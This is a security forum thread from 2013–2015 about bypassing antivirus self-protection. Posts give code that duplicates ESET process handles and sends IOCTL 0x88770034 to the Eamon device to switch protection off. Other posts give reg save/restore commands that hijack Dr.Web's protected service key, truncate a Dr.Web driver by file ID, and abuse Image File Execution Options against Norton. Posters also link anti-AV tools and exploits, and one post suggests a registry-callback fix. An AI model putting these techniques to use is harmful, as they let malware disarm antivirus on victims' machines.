AV SP Discussion & Bypass

Forum for discussion about user-mode development.
User avatar
0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Wed Jun 26, 2013 2:05 am

Note about Eset SP bypassing,found it in leaked super elite CrapBerp source pack :ugeek:
So,NOD allow to open own processes with this access:
OpenProcess(PROCESS_DUP_HANDLE|PROCESS_QUERY_INFORMATION..)
After opening process {ekrn.exe} they start enuming them handles and duplicate like here:
DuplicateHandle(ekrn_handle_process, (HANDLE)handleInfo->Handles[dwIdx].Handle, NtCurrentProcess(), &hObject, DUPLICATE_SAME_ACCESS, FALSE, DUPLICATE_SAME_ACCESS)
All duplicated handles transmitt to function NtDeviceIoControlFile with IOCTL 0x88770034:

Code: Select all

UCHAR Buff[0x4] = {0x01, 0x00, 0x00, 0x00};
NtDeviceIoControlFile(hObject, NULL, NULL, NULL, &StatusBlock, 0x88770034, Buff, sizeof(Buff), Buff, sizeof(Buff));
Okay in case when duplicated hObject == \Device\Eamon
function NtDeviceIoControlFile call fastIoDispatch->FastIoDeviceControl of eamon.sys driver.
Seems like that IOCTL 0x88770034 just disable av SP.
Cause and effect

User avatar
Alex
Posts: 268
Joined: Sun Mar 07, 2010 11:34 am

Re: AV SP Discussion & Bypass

Post by Alex » Wed Jun 26, 2013 4:23 pm

I was using the same method to exploit an old ESET's vulnerability. So, ESET still doesn't protect access to its devices. I've never checked functionalities of available IOCTLs, but this is not first and not last time when such easy scenario can be used to disarm AVs. Other AVs should also provide similar functionalities - especially if their GUIs are not protected... An old presentation (ESET once again) - Disabling Antivirus program(s).
I am Jack's NULL pointer (actual e-mail contact.ntinternals_at_gmail.com)

AlephNull314
Posts: 1
Joined: Thu Oct 03, 2013 11:28 pm

Re: AV SP Discussion & Bypass

Post by AlephNull314 » Thu Oct 03, 2013 11:32 pm

Open source project,anti-AV compilation.
https://github.com/AlephNull314/AbsoluteZero

N3mes1s
Posts: 42
Joined: Wed Mar 09, 2011 5:17 pm

Re: AV SP Discussion & Bypass

Post by N3mes1s » Fri Oct 25, 2013 7:09 am

http://mallocat.com/another-journey-to- ... scalation/

affected Avira Internet security and Ahnlab V3 internet security

He used PoolBlade exploitation http://mallocat.com/wp-content/uploads/ ... lBlade.pdf

User avatar
0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Tue Feb 04, 2014 4:27 pm

I decided to make the video :"how I pwn KGBav with new HIPS system"(DrWeb 9.0) with 100% stealth,without any popup windows,security alerts and etc..

What i have:
-full admin rights
-all work in user mode
-AV settings is paranoidal

Video of this tragedy:
http://www.sendspace.com/file/8bukm5

p.S.
I recommend wipe this crap from your PC,if you still believe in super elite AV protection.
p.ZZzz
SpiDie will never die :lol:
Cause and effect

KiFastCallEntry
Posts: 3
Joined: Wed Feb 26, 2014 2:04 pm

Re: AV SP Discussion & Bypass

Post by KiFastCallEntry » Wed Feb 26, 2014 2:10 pm

nice work 0x16/7ton, some lock tricks you discovered are not working anymore, I just get pissed off when I don't know how they protected from the tricks, some AVs do not use any kind of FS driver filter, so I dont really get how they do it

User avatar
R00tKit
Posts: 129
Joined: Tue Nov 16, 2010 8:23 pm
Contact:

Re: AV SP Discussion & Bypass

Post by R00tKit » Mon Mar 10, 2014 9:09 am

Hi

i find 2 ( one share now ) new vulnerability in Dr.Web Self Protection :

1) remove Reg key's :

Code: Select all

reg save HKLM\SYSTEM\CurrentControlSet\serviceMPTRAP  hive.hiv
reg restore HKLM\SYSTEM\CurrentControlSet\services\SpiderG3 hive.hiv
with this we can replace fake key with Dr.web key and Dr.Web will protect our service key :D
after replace SpiderG3 with serviceMPTRAP :D
reg.png
other VA not tested ( kaspresky is safe : )


edit: solution

filter this is (RegistryCallback)
Vista SP2+ RegNtPreRestoreKey,RegNtPreSaveKey,RegNtPreReplaceKey,
and use SSDT in Vista SP2-- ( 32bit)
You do not have the required permissions to view the files attached to this post.
@R00tkitSMM

User avatar
R00tKit
Posts: 129
Joined: Tue Nov 16, 2010 8:23 pm
Contact:

Re: AV SP Discussion & Bypass

Post by R00tKit » Mon Mar 10, 2014 3:32 pm

second method is get sys file ID is dr.web in drivers path and open file with file ID with OPEN_EXISTING + TRUNCATE_EXISTING
after this sys file will truncate after reboot no AV :D :mrgreen:

for Norton 2014 i find this also -> set image File execution option for NIS.exe -> after reboot no AV :D :mrgreen:

so simple need POC ?
@R00tkitSMM

cuttingedge
Posts: 3
Joined: Mon Jul 02, 2012 5:17 am

Re: AV SP Discussion & Bypass

Post by cuttingedge » Tue Nov 03, 2015 12:59 am

Could someone make a mirror of all the dead sendspace.com links on this thread back from 2012? There was some great shares but they did not upload them to kernalmode. Maybe someone has them archived?

Thank you!

User avatar
EP_X0FF
Global Moderator
Posts: 4884
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Re: AV SP Discussion & Bypass

Post by EP_X0FF » Tue Nov 03, 2015 5:04 am

Most of these links were video files. Which one exactly you want?
Ring0 - the source of inspiration

Post Reply